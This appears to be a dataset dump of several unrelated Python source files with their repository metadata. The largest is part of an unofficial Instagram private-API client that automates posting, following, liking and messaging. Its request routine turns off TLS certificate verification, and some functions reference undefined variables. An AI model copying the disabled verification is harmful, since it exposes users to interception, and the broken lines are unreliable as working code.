correct = False
try:
user_id = long(user_id)
if user_id < 0:
correct = False
except:
correct = False
if not correct:
raise Exception('Invalid user entry in usertags array.')
def configureTimelineAlbum(self, media, albumInternalMetadata, captionText='', location=None):
endpoint = 'media/configure_sidecar/'
albumUploadId = self.generateUploadId()
date = datetime.utcnow().isoformat()
childrenMetadata = []
for item in media:
itemInternalMetadata = item['internalMetadata']
uploadId = itemInternalMetadata.get('upload_id', self.generateUploadId())
if item.get('type', '') == 'photo':
# Build this item's configuration.
photoConfig = {'date_time_original': date,
'scene_type': 1,
'disable_comments': False,
'upload_id': uploadId,
'source_type': 0,
'scene_capture_type': 'standard',
'date_time_digitized': date,
'geotag_enabled': False,
'camera_position': 'back',
'edits': {'filter_strength': 1,
'filter_name': 'IGNormalFilter'}
}
# This usertag per-file EXTERNAL metadata is only supported for PHOTOS!
if item.get('usertags', []):
# NOTE: These usertags were validated in Timeline::uploadAlbum.
photoConfig['usertags'] = json.dumps({'in': item['usertags']})
childrenMetadata.append(photoConfig)
if item.get('type', '') == 'video':
# Get all of the INTERNAL per-VIDEO metadata.
videoDetails = itemInternalMetadata.get('video_details', {})
# Build this item's configuration.
videoConfig = {'length': videoDetails.get('duration', 1.0),
'date_time_original': date,
'scene_type': 1,
'poster_frame_index': 0,
'trim_type': 0,
'disable_comments': False,
'upload_id': uploadId,
'source_type': 'library',
'geotag_enabled': False,
'edits': {
'length': videoDetails.get('duration', 1.0),
'cinema': 'unsupported',
'original_length': videoDetails.get('duration', 1.0),
'source_type': 'library',
'start_time': 0,
'camera_position': 'unknown',
'trim_type': 0}
}
childrenMetadata.append(videoConfig)
# Build the request...
data = {'_csrftoken': self.token,
'_uid': self.username_id,
'_uuid': self.uuid,
'client_sidecar_id': albumUploadId,
'caption': captionText,
'children_metadata': childrenMetadata}
self.SendRequest(endpoint, self.generateSignature(json.dumps(data)))
response = self.LastResponse
if response.status_code == 200:
self.LastResponse = response
self.LastJson = json.loads(response.text)
return True
else:
print("Request return " + str(response.status_code) + " error!")
# for debugging
try:
self.LastResponse = response
self.LastJson = json.loads(response.text)
except:
pass
return False
def direct_share(self, media_id, recipients, text=None):
if not isinstance(position, list):
recipients = [str(recipients)]
recipient_users = '"",""'.join(str(r) for r in recipients)
endpoint = 'direct_v2/threads/broadcast/media_share/?media_type=photo'
boundary = self.uuid
bodies = [
{
'type': 'form-data',
'name': 'media_id',
'data': media_id,
},
{
'type': 'form-data',
'name': 'recipient_users',
'data': '[["{}"]]'.format(recipient_users),
},
{
'type': 'form-data',
'name': 'client_context',
'data': self.uuid,
},
{
'type': 'form-data',
'name': 'thread',
'data': '["0"]',
},
{
'type': 'form-data',
'name': 'text',
'data': text or '',
},
]
data = self.buildBody(bodies, boundary)
self.s.headers.update({'User-Agent': self.USER_AGENT,
'Proxy-Connection': 'keep-alive',
'Connection': 'keep-alive',
'Accept': '*/*',
'Content-Type': 'multipart/form-data; boundary={}'.format(boundary),
'Accept-Language': 'en-en'})
# self.SendRequest(endpoint,post=data) #overwrites 'Content-type' header and boundary is missed
response = self.s.post(self.API_URL + endpoint, data=data)
if response.status_code == 200:
self.LastResponse = response
self.LastJson = json.loads(response.text)
return True
else:
print("Request return " + str(response.status_code) + " error!")
# for debugging
try:
self.LastResponse = response
self.LastJson = json.loads(response.text)
except:
pass
return False
def configureVideo(self, upload_id, video, thumbnail, caption=''):
clip = VideoFileClip(video)
self.uploadPhoto(photo=thumbnail, caption=caption, upload_id=upload_id)
data = json.dumps({
'upload_id': upload_id,
'source_type': 3,
'poster_frame_index': 0,
'length': 0.00,
'audio_muted': False,
'filter_type': 0,
'video_result': 'deprecated',
'clips': {
'length': clip.duration,
'source_type': '3',
'camera_position': 'back',
},
'extra': {
'source_width': clip.size[0],
'source_height': clip.size[1],
},
'device': self.DEVICE_SETTINTS,
'_csrftoken': self.token,
'_uuid': self.uuid,
'_uid': self.username_id,
'caption': caption,
})
return self.SendRequest('media/configure/?video=1', self.generateSignature(data))
def configure(self, upload_id, photo, caption=''):
(w, h) = getImageSize(photo)
data = json.dumps({'_csrftoken': self.token,
'media_folder': 'Instagram',
'source_type': 4,
'_uid': self.username_id,
'_uuid': self.uuid,
'caption': caption,
'upload_id': upload_id,
'device': self.DEVICE_SETTINTS,
'edits': {
'crop_original_size': [w * 1.0, h * 1.0],
'crop_center': [0.0, 0.0],
'crop_zoom': 1.0
},
'extra': {
'source_width': w,
'source_height': h
}})
return self.SendRequest('media/configure/?', self.generateSignature(data))
def editMedia(self, mediaId, captionText=''):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'caption_text': captionText})
return self.SendRequest('media/' + str(mediaId) + '/edit_media/', self.generateSignature(data))
def removeSelftag(self, mediaId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token})
return self.SendRequest('media/' + str(mediaId) + '/remove/', self.generateSignature(data))
def mediaInfo(self, mediaId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'media_id': mediaId})
return self.SendRequest('media/' + str(mediaId) + '/info/', self.generateSignature(data))
def deleteMedia(self, mediaId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'media_id': mediaId})
return self.SendRequest('media/' + str(mediaId) + '/delete/', self.generateSignature(data))
def changePassword(self, newPassword):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'old_password': self.password,
'new_password1': newPassword,
'new_password2': newPassword})
return self.SendRequest('accounts/change_password/', self.generateSignature(data))
def explore(self):
return self.SendRequest('discover/explore/')
def comment(self, mediaId, commentText):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'comment_text': commentText})
return self.SendRequest('media/' + str(mediaId) + '/comment/', self.generateSignature(data))
def deleteComment(self, mediaId, commentId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token})
return self.SendRequest('media/' + str(mediaId) + '/comment/' + str(commentId) + '/delete/', self.generateSignature(data))
def changeProfilePicture(self, photo):
# TODO Instagram.php 705-775
return False
def removeProfilePicture(self):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token})
return self.SendRequest('accounts/remove_profile_picture/', self.generateSignature(data))
def setPrivateAccount(self):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token})
return self.SendRequest('accounts/set_private/', self.generateSignature(data))
def setPublicAccount(self):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token})
return self.SendRequest('accounts/set_public/', self.generateSignature(data))
def getProfileData(self):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token})
return self.SendRequest('accounts/current_user/?edit=true', self.generateSignature(data))
def editProfile(self, url, phone, first_name, biography, email, gender):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'external_url': url,
'phone_number': phone,
'username': self.username,
'full_name': first_name,
'biography': biography,
'email': email,
'gender': gender})
return self.SendRequest('accounts/edit_profile/', self.generateSignature(data))
def getUsernameInfo(self, usernameId):
return self.SendRequest('users/' + str(usernameId) + '/info/')
def getSelfUsernameInfo(self):
return self.getUsernameInfo(self.username_id)
def getSelfSavedMedia(self):
return self.SendRequest('feed/saved')
def getRecentActivity(self):
activity = self.SendRequest('news/inbox/?')
return activity
def getFollowingRecentActivity(self):
activity = self.SendRequest('news/?')
return activity
def getv2Inbox(self):
inbox = self.SendRequest('direct_v2/inbox/?')
return inbox
def getv2Threads(self, thread, cursor=None):
endpoint = 'direct_v2/threads/{0}'.format(thread)
if cursor is not None:
endpoint += '?cursor={0}'.format(cursor)
inbox = self.SendRequest(endpoint)
return inbox
def getUserTags(self, usernameId):
tags = self.SendRequest('usertags/' + str(usernameId) + '/feed/?rank_token=' + str(self.rank_token) + '&ranked_content=true&')
return tags
def getSelfUserTags(self):
return self.getUserTags(self.username_id)
def tagFeed(self, tag):
userFeed = self.SendRequest('feed/tag/' + str(tag) + '/?rank_token=' + str(self.rank_token) + '&ranked_content=true&')
return userFeed
def getMediaLikers(self, mediaId):
likers = self.SendRequest('media/' + str(mediaId) + '/likers/?')
return likers
def getGeoMedia(self, usernameId):
locations = self.SendRequest('maps/user/' + str(usernameId) + '/')
return locations
def getSelfGeoMedia(self):
return self.getGeoMedia(self.username_id)
def fbUserSearch(self, query):
query = self.SendRequest('fbsearch/topsearch/?context=blended&query=' + str(query) + '&rank_token=' + str(self.rank_token))
return query
def searchUsers(self, query):
query = self.SendRequest('users/search/?ig_sig_key_version=' + str(self.SIG_KEY_VERSION) + '&is_typeahead=true&query=' + str(query) + '&rank_token=' + str(self.rank_token))
return query
def searchUsername(self, usernameName):
query = self.SendRequest('users/' + str(usernameName) + '/usernameinfo/')
return query
def syncFromAdressBook(self, contacts):
return self.SendRequest('address_book/link/?include=extra_display_name,thumbnails', "contacts=" + json.dumps(contacts))
def searchTags(self, query):
query = self.SendRequest('tags/search/?is_typeahead=true&q=' + str(query) + '&rank_token=' + str(self.rank_token))
return query
def getTimeline(self):
query = self.SendRequest('feed/timeline/?rank_token=' + str(self.rank_token) + '&ranked_content=true&')
return query
def getUserFeed(self, usernameId, maxid='', minTimestamp=None):
query = self.SendRequest('feed/user/%s/?max_id=%s&min_timestamp=%s&rank_token=%s&ranked_content=true'
% (usernameId, maxid, minTimestamp, self.rank_token))
return query
def getSelfUserFeed(self, maxid='', minTimestamp=None):
return self.getUserFeed(self.username_id, maxid, minTimestamp)
def getHashtagFeed(self, hashtagString, maxid=''):
return self.SendRequest('feed/tag/' + hashtagString + '/?max_id=' + str(maxid) + '&rank_token=' + self.rank_token + '&ranked_content=true&')
def searchLocation(self, query):
locationFeed = self.SendRequest('fbsearch/places/?rank_token=' + str(self.rank_token) + '&query=' + str(query))
return locationFeed
def getLocationFeed(self, locationId, maxid=''):
return self.SendRequest('feed/location/' + str(locationId) + '/?max_id=' + maxid + '&rank_token=' + self.rank_token + '&ranked_content=true&')
def getPopularFeed(self):
popularFeed = self.SendRequest('feed/popular/?people_teaser_supported=1&rank_token=' + str(self.rank_token) + '&ranked_content=true&')
return popularFeed
def getUserFollowings(self, usernameId, maxid=''):
url = 'friendships/' + str(usernameId) + '/following/?'
query_string = {'ig_sig_key_version': self.SIG_KEY_VERSION,
'rank_token': self.rank_token}
if maxid:
query_string['max_id'] = maxid
if sys.version_info.major == 3:
url += urllib.parse.urlencode(query_string)
else:
url += urllib.urlencode(query_string)
return self.SendRequest(url)
def getSelfUsersFollowing(self):
return self.getUserFollowings(self.username_id)
def getUserFollowers(self, usernameId, maxid=''):
if maxid == '':
return self.SendRequest('friendships/' + str(usernameId) + '/followers/?rank_token=' + self.rank_token)
else:
return self.SendRequest('friendships/' + str(usernameId) + '/followers/?rank_token=' + self.rank_token + '&max_id=' + str(maxid))
def getSelfUserFollowers(self):
return self.getUserFollowers(self.username_id)
def like(self, mediaId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'media_id': mediaId})
return self.SendRequest('media/' + str(mediaId) + '/like/', self.generateSignature(data))
def unlike(self, mediaId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'_csrftoken': self.token,
'media_id': mediaId})
return self.SendRequest('media/' + str(mediaId) + '/unlike/', self.generateSignature(data))
def getMediaComments(self, mediaId, max_id=''):
return self.SendRequest('media/' + mediaId + '/comments/?max_id=' + max_id)
def setNameAndPhone(self, name='', phone=''):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'first_name': name,
'phone_number': phone,
'_csrftoken': self.token})
return self.SendRequest('accounts/set_phone_and_name/', self.generateSignature(data))
def getDirectShare(self):
return self.SendRequest('direct_share/inbox/?')
def backup(self):
# TODO Instagram.php 1470-1485
return False
def follow(self, userId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'user_id': userId,
'_csrftoken': self.token})
return self.SendRequest('friendships/create/' + str(userId) + '/', self.generateSignature(data))
def unfollow(self, userId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'user_id': userId,
'_csrftoken': self.token})
return self.SendRequest('friendships/destroy/' + str(userId) + '/', self.generateSignature(data))
def block(self, userId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'user_id': userId,
'_csrftoken': self.token})
return self.SendRequest('friendships/block/' + str(userId) + '/', self.generateSignature(data))
def unblock(self, userId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'user_id': userId,
'_csrftoken': self.token})
return self.SendRequest('friendships/unblock/' + str(userId) + '/', self.generateSignature(data))
def userFriendship(self, userId):
data = json.dumps({'_uuid': self.uuid,
'_uid': self.username_id,
'user_id': userId,
'_csrftoken': self.token})
return self.SendRequest('friendships/show/' + str(userId) + '/', self.generateSignature(data))
def getLikedMedia(self, maxid=''):
return self.SendRequest('feed/liked/?max_id=' + str(maxid))
def generateSignature(self, data, skip_quote=False):
if not skip_quote:
try:
parsedData = urllib.parse.quote(data)
except AttributeError:
parsedData = urllib.quote(data)
else:
parsedData = data
return 'ig_sig_key_version=' + self.SIG_KEY_VERSION + '&signed_body=' + hmac.new(self.IG_SIG_KEY.encode('utf-8'), data.encode('utf-8'), hashlib.sha256).hexdigest() + '.' + parsedData
def generateDeviceId(self, seed):
volatile_seed = "12345"
m = hashlib.md5()
m.update(seed.encode('utf-8') + volatile_seed.encode('utf-8'))
return 'android-' + m.hexdigest()[:16]
def generateUUID(self, type):
generated_uuid = str(uuid.uuid4())
if (type):
return generated_uuid
else:
return generated_uuid.replace('-', '')
def generateUploadId(self):
return str(calendar.timegm(datetime.utcnow().utctimetuple()))
def buildBody(self, bodies, boundary):
body = u''
for b in bodies:
body += u'--{boundary}\r\n'.format(boundary=boundary)
body += u'Content-Disposition: {b_type}; name="{b_name}"'.format(b_type=b['type'], b_name=b['name'])
_filename = b.get('filename', None)
_headers = b.get('headers', None)
if _filename:
_filename, ext = os.path.splitext(_filename)
_body += u'; filename="pending_media_{uid}.{ext}"'.format(uid=self.generateUploadId(), ext=ext)
if _headers and isinstance(_headers, list):
for h in _headers:
_body += u'\r\n{header}'.format(header=h)
body += u'\r\n\r\n{data}\r\n'.format(data=b['data'])
body += u'--{boundary}--'.format(boundary=boundary)
return body
def SendRequest(self, endpoint, post=None, login=False):
verify = False # don't show request warning
if (not self.isLoggedIn and not login):
raise Exception("Not logged in!\n")
self.s.headers.update({'Connection': 'close',
'Accept': '*/*',
'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Cookie2': '$Version=1',
'Accept-Language': 'en-US',
'User-Agent': self.USER_AGENT})
while True:
try:
if (post is not None):
response = self.s.post(self.API_URL + endpoint, data=post, verify=verify)
else:
response = self.s.get(self.API_URL + endpoint, verify=verify)
break
except Exception as e:
print('Except on SendRequest (wait 60 sec and resend): ' + str(e))
time.sleep(60)
if response.status_code == 200:
self.LastResponse = response
self.LastJson = json.loads(response.text)
return True
else:
print("Request return " + str(response.status_code) + " error!")
# for debugging
try:
self.LastResponse = response
self.LastJson = json.loads(response.text)
print(self.LastJson)
except:
pass
return False
def getTotalFollowers(self, usernameId):
followers = []
next_max_id = ''
while 1:
self.getUserFollowers(usernameId, next_max_id)
temp = self.LastJson
for item in temp["users"]:
followers.append(item)
if temp["big_list"] is False:
return followers
next_max_id = temp["next_max_id"]
def getTotalFollowings(self, usernameId):
followers = []
next_max_id = ''
while True:
self.getUserFollowings(usernameId, next_max_id)
temp = self.LastJson
for item in temp["users"]:
followers.append(item)
if temp["big_list"] is False:
return followers
next_max_id = temp["next_max_id"]
def getTotalUserFeed(self, usernameId, minTimestamp=None):
user_feed = []
next_max_id = ''
while True:
self.getUserFeed(usernameId, next_max_id, minTimestamp)
temp = self.LastJson
for item in temp["items"]:
user_feed.append(item)
if temp["more_available"] is False:
return user_feed
next_max_id = temp["next_max_id"]
def getTotalSelfUserFeed(self, minTimestamp=None):
return self.getTotalUserFeed(self.username_id, minTimestamp)
def getTotalSelfFollowers(self):
return self.getTotalFollowers(self.username_id)
def getTotalSelfFollowings(self):
return self.getTotalFollowings(self.username_id)
def getTotalLikedMedia(self, scan_rate=1):
next_id = ''
liked_items = []
for x in range(0, scan_rate):
temp = self.getLikedMedia(next_id)
temp = self.LastJson
try:
next_id = temp["next_max_id"]
for item in temp["items"]:
liked_items.append(item)
except KeyError as e:
break
return liked_items
|
[
"furkan.aalperen@gmail.com"
] |
furkan.aalperen@gmail.com
|
062eb22c54e54134722697966c14311f9e383461
|
daa053212901b51273bb1f8a6ca3eddac2b5cbaf
|
/main/apps/companies/management/commands/seed_consultants.py
|
5df7ab0584e1e6e4412334b82052d2652e8c51ca
|
[] |
no_license
|
truhlik/directit
|
11fb45d482d454b55888f38afe0f64ce533788ad
|
eb10654b64cbe4232811594b936f8e3d0381754e
|
refs/heads/main
| 2023-08-30T10:03:45.376159
| 2021-10-06T19:02:15
| 2021-10-06T19:02:15
| 414,334,714
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,114
|
py
|
import os
import json
from django.core.management.base import BaseCommand
from django.conf import settings
from django.db import transaction
from main.apps.categories.models import Category
from main.apps.companies.models import Company
from main.apps.companies import constants
from main.apps.tags.models import Tag
class Command(BaseCommand):
help = 'Seed Consultants'
# konvertováno pomocí http://beautifytools.com/excel-to-json-converter.php
def handle(self, *args, **options):
path = os.path.join(settings.BASE_DIR, 'seeds', 'consultants2.json')
with open(path, mode='r') as f:
data = json.load(f)
with transaction.atomic():
self.process_data(data)
def process_data(self, data, parent=None):
for konzultant_dct in data['Konzultanti']:
self._create_consultant(konzultant_dct)
def _create_consultant(self, data):
if Company.objects.filter(name=data.get('Jmeno', '') + ' ' + data.get('Prijmeni', '')).exists():
return
c = Company(
role=constants.COMPANY_ROLE_CONSULTANT,
name=data.get('Jmeno', '') + ' ' + data.get('Prijmeni', ''),
description=data.get('Specifikace', None),
email=data.get('Email', None),
phone=data.get('Telefon', None),
city=data.get('Město', None),
)
c.save()
self.add_tags(c, data.get('Tagy - Technologie', '').split(','))
self.add_tags(c, data.get('Tagy - Kompetence', '').split(','))
def add_tags(self, consultant, data):
tags = []
for tag in data:
t, created = Tag.objects.get_or_create(name=tag.strip())
if t is not None:
tags.append(t)
else:
print(tag)
consultant.tags.add(*tags)
def add_categories(self, consultant, data):
tags = []
for category in data:
t = Category.objects.filter(name=category.strip()).first()
if t is not None:
tags.append(t)
consultant.categories.add(*tags)
|
[
"lubos@endevel.cz"
] |
lubos@endevel.cz
|
0dbd5fdba95bed8a268db8202b3fb87885b024ec
|
7b270cf5f9d0a3e26b5afd758563c6cff73a5248
|
/comportamentais/templateMethod/musica/musica/ordenadores/por_nome.py
|
20811813acfc8389cb954bc7cf5afb90f6bd5ea6
|
[] |
no_license
|
reginaldosantarosa/DesignPatterns
|
10810672d3831e562ec636a5f66bd709c797ca34
|
bec4247f52b8d2e1fe41c570408816a5d4b22608
|
refs/heads/master
| 2020-04-04T06:54:19.757054
| 2018-01-04T03:06:05
| 2018-01-04T03:06:05
| 155,761,201
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 375
|
py
|
from musica.ordenador import Ordenador
class PorNome(Ordenador):
"""
Ordena as músicas por nome.
"""
def vem_antes(self, musica1, musica2):
"""
Verifica se o nome da musica1 vem antes do nome da musica2
ou se os nomes são iguais
"""
if (musica1.nome >= musica2.nome):
return True
return False
|
[
"victorhad@gmail.com"
] |
victorhad@gmail.com
|
a58aad7520eda26f26eea0cbde53195c6e1f95ff
|
5da5473ff3026165a47f98744bac82903cf008e0
|
/packages/google-cloud-dataplex/samples/generated_samples/dataplex_v1_generated_dataplex_service_list_lake_actions_async.py
|
6bb70e947a1d2da68ce6f3f24464c8d42da2e31a
|
[
"Apache-2.0"
] |
permissive
|
googleapis/google-cloud-python
|
ed61a5f03a476ab6053870f4da7bc5534e25558b
|
93c4e63408c65129422f65217325f4e7d41f7edf
|
refs/heads/main
| 2023-09-04T09:09:07.852632
| 2023-08-31T22:49:26
| 2023-08-31T22:49:26
| 16,316,451
| 2,792
| 917
|
Apache-2.0
| 2023-09-14T21:45:18
| 2014-01-28T15:51:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,915
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for ListLakeActions
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dataplex
# [START dataplex_v1_generated_DataplexService_ListLakeActions_async]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import dataplex_v1
async def sample_list_lake_actions():
# Create a client
client = dataplex_v1.DataplexServiceAsyncClient()
# Initialize request argument(s)
request = dataplex_v1.ListLakeActionsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_lake_actions(request=request)
# Handle the response
async for response in page_result:
print(response)
# [END dataplex_v1_generated_DataplexService_ListLakeActions_async]
|
[
"noreply@github.com"
] |
googleapis.noreply@github.com
|
03d54f61b29f53b93ad2fd757e4e11559959bdce
|
293d7ab59c9e7ff4e1341fb8e6504a89f3384666
|
/python/test/utils/test_graph_converters/test_batch_normalization_self_folding.py
|
1e2d303962a499a835d6efa13a3da5acd8dc33bf
|
[
"Apache-2.0"
] |
permissive
|
CrimsonTuna/nnabla
|
903423b8eb3617c3623952605bcdd77bb5ab2a56
|
36328e574d77f1cc9ee0051f33159a2dc4f03013
|
refs/heads/master
| 2023-03-29T07:12:33.444996
| 2021-04-11T09:33:21
| 2021-04-11T09:33:21
| 356,857,925
| 0
| 0
|
Apache-2.0
| 2021-04-11T13:09:02
| 2021-04-11T12:10:47
| null |
UTF-8
|
Python
| false
| false
| 1,774
|
py
|
# Copyright (c) 2020 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import pytest
import numpy as np
import nnabla as nn
import nnabla.experimental.graph_converters as GC
from .ref_graphs.resnets import small_cf_resnet, small_bn_self_folding_resnet
batch_size = 1
resnet_ref = small_bn_self_folding_resnet
@pytest.mark.parametrize('seed', [313])
@pytest.mark.parametrize('test', [True])
@pytest.mark.parametrize('graph_ref, graph_act', [(resnet_ref, small_cf_resnet)])
def test_batch_normalization_self_folding(seed, test, graph_ref, graph_act):
from .graph_converter_test_utils import structure_tester, value_tester
# Random number
np.random.seed(seed)
rng = np.random.RandomState(seed)
# Graph
x_data = rng.randn(batch_size, 3, 32, 32)
x = nn.Variable.from_numpy_array(x_data)
y_tgt = graph_act(x, test=test)
# FunctionModifier
modifiers = []
modifiers.append(GC.BatchNormalizationSelfFoldingModifier())
y_act = GC.GraphConverter(modifiers).convert(y_tgt)
# Ref Graph
y_ref = graph_ref(x, name='bn-self-folding-graph-ref')
# Test
structure_tester(y_ref, y_act)
value_tester(y_tgt, y_act, rtol=6e-02, atol=5e-02)
|
[
"Kazuki.Yoshiyama@sony.com"
] |
Kazuki.Yoshiyama@sony.com
|
82bd13fb6585eb7e350d867d90ba5d73d5caf38e
|
5850d0bd221cec491f94cf68a6d880abdb838f0e
|
/tests/exoatlet/spat_decomp.py
|
cbefd3bddcc77909c7648fbe0e25bd9bd3f24412
|
[] |
no_license
|
nickware44/DeepBCI
|
336a437e2a519d09e74f57e692e4c59ac7b1db70
|
96b99b36e888a740dd955b7f6d3f8f05b94efd17
|
refs/heads/master
| 2023-08-03T09:08:20.283055
| 2023-07-27T19:17:13
| 2023-07-27T19:17:13
| 336,832,704
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,260
|
py
|
path_to_nfblab = r'C:\Projects\nfblab\nfb'
import sys
import numpy as np
import pylab as plt
import pandas as pd
import scipy.signal as sg
sys.path.insert(0, path_to_nfblab)
from utils.load_results import load_data
from pynfb.signal_processing.filters import ButterFilter
from pynfb.signal_processing.decompositions import ICADecomposition, CSPDecomposition
from pynfb.inlets.montage import Montage
from mne.viz import plot_topomap
# settings
h5_file = r'C:\Projects\nfblab\nfb\pynfb\results\exoatlet_kolai_stay_go_10-24_15-47-00\experiment_data.h5'
band = (15, 30)
method = 'ica'
np.random.seed(401)
# load data
df, fs, channels, p_names = load_data(h5_file)
fs = int(fs)
eeg_channels = channels[:30]
n_channels = len(eeg_channels)
montage = Montage(eeg_channels)
print('Fs: {}Hz\nAll channels: {}\nEEG channels: {}\nBlock sequence: {}'.format(
fs, ', '.join(channels), ', '.join(eeg_channels), '-'.join(p_names)))
# pre filter
pre_filter = ButterFilter(band, fs, n_channels)
df[eeg_channels] = pre_filter.apply(df[eeg_channels])
df = df.iloc[fs*5:]
# spatial decomposition
if method == 'ica':
decomposition = ICADecomposition(eeg_channels, fs)
elif method == 'csp':
decomposition = CSPDecomposition(eeg_channels, fs)
else:
raise ValueError('Bad method name. Use "ica" or "csp".')
# select data between first and second "pause" block
first_b_number = p_names.index('Pause') + 1
second_b_number = 10000# p_names.index('Pause', 1) + 1
X = df.loc[(df.block_number>first_b_number) & (df.block_number<second_b_number)]
# fit decomposition
decomposition.fit(X[eeg_channels], X.block_name=='Go')
# init axes
n_rows = 5
n_cols = 6
fig, axes = plt.subplots(n_rows, n_cols * 2, figsize=(15, 10))
plt.subplots_adjust(hspace=1)
# sort by erd
erds = np.zeros(n_channels)
erd_band = band # (18, 30)
for k in range(n_channels):
filt = decomposition.filters[:, k]
go_data = X.loc[X.block_name == 'Go', eeg_channels].values
st_data = X.loc[X.block_name == 'Stay', eeg_channels].values
freq, go_spec = sg.welch(go_data.dot(filt), fs)
freq, st_spec = sg.welch(st_data.dot(filt), fs)
freq_slice = (freq > erd_band[0]) & (freq < erd_band[1])
erds[k] = (st_spec[freq_slice].mean() - go_spec[freq_slice].mean()) / st_spec[freq_slice].mean()
# plot axes
for j, k in enumerate(np.argsort(erds)[::-1]):
topo = decomposition.topographies[:, k]
filt = decomposition.filters[:, k]
ax = axes[j // n_cols, j % n_cols * 2]
plot_topomap(topo, montage.get_pos(), axes=ax, show=False, contours=0)
ax.set_title(str(k))
ax.set_xlabel('{:.1f}%'.format(erds[k] * 100))
go_data = X.loc[X.block_name == 'Go', eeg_channels].values
st_data = X.loc[X.block_name == 'Stay', eeg_channels].values
freq, go_spec = sg.welch(go_data.dot(filt), fs)
freq, st_spec = sg.welch(st_data.dot(filt), fs)
freq_slice = (freq > 3) & (freq < 40)
ax = axes[j // n_cols, j % n_cols * 2 + 1]
ax.plot(freq[freq_slice], go_spec[freq_slice])
ax.plot(freq[freq_slice], st_spec[freq_slice])
ax.fill_between(freq[freq_slice], go_spec[freq_slice], st_spec[freq_slice], alpha=0.5)
ax.get_yaxis().set_visible(False)
ax.set_xticks([0, 10, 20, 30, 40])
ax.set_xticklabels([0, 10, 20, 30, 40])
plt.show()
|
[
"n.m.smetanin@gmail.com"
] |
n.m.smetanin@gmail.com
|
cddba55aea5b0e697b0e759fa4236c9772032db5
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/070_oop/007_exceptions/_exercises/templates/GoCongr/002_Exceptions.py
|
558802c1cef142e35946dbce32921cc93b0cf096
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395
| 2023-05-29T17:09:11
| 2023-05-29T17:09:11
| 220,583,118
| 3
| 2
| null | 2023-02-16T03:08:10
| 2019-11-09T02:58:47
|
Python
|
UTF-8
|
Python
| false
| false
| 686
|
py
|
# # -*- coding: utf-8 -*-
#
# # Nested handlers
# ___ # Обрабатываем исключения
# ___ # Вложенный обработчик
# x = 1 / 0 # Ошибка: деление на 0
# ____ N...
# print("Неопределенный идентификатор")
# ____ I...
# print("Несуществующий индекс")
# print("Выражение после вложенного обработчика")
# ____ Z..
# print("Обработка деления на 0")
# x _ 0
# print? # Выведет: 0
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
f572de46bf3442d83632a194c67fbc4ea0587da3
|
9a1dbd1d6dcdb5a4d238fa72ff1eb8e8ac99c9fb
|
/EBookReading/wsgi.py
|
b4b370837d698fee742a9d781becb9f7af5f318b
|
[] |
no_license
|
chintan-27/E-Book-Reading-Website
|
85c0aa7515169f13bb8939aba9ee36bc64af17b8
|
693a75756f9e9b99631bff7973c4da16ed3716a4
|
refs/heads/main
| 2023-08-22T06:04:48.118415
| 2021-09-08T05:37:35
| 2021-09-08T05:37:35
| 378,327,140
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 450
|
py
|
"""
